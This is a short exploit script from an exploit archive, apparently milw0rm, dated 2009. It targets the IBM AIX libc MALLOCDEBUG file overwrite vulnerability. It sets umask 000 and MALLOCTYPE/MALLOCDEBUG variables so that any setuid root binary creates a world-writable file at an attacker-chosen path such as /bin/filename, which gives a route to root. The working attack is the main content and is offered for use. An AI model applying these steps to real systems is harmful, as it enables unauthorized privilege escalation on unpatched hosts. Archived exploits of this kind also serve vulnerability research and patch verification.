#!/bin/bash ################################################################# # _______ _________ _ # # ( ____ )\__ __/( ( /| # # | ( )| ) ( | \ ( | # # | (____)| | | | \ | | # # | __) | | | (\ \) | # # | (\ ( | | | | \ | # # | ) \ \__ | | | ) \ | # # |/ \__/ )_( |/ )_) # # http://root-the.net # ################################################################# #[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability # #[+] Refer : securitytracker.com/id?1022261 # #[+] Exploit : Affix # #[+] Tested on : IBM AIX # #[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, # # str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull # # AIX 5.3 ML 5 is where this bad libc code was added. # # Libs Affected : # # /usr/ccs/lib/libc.a # # /usr/ccs/lib/libp/libc.a # ################################################################# Set the following environment variables: umask 000 MALLOCTYPE=debug MALLOCDEBUG=report_allocations,output:/bin/filename echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions." # milw0rm.com [2009-07-30]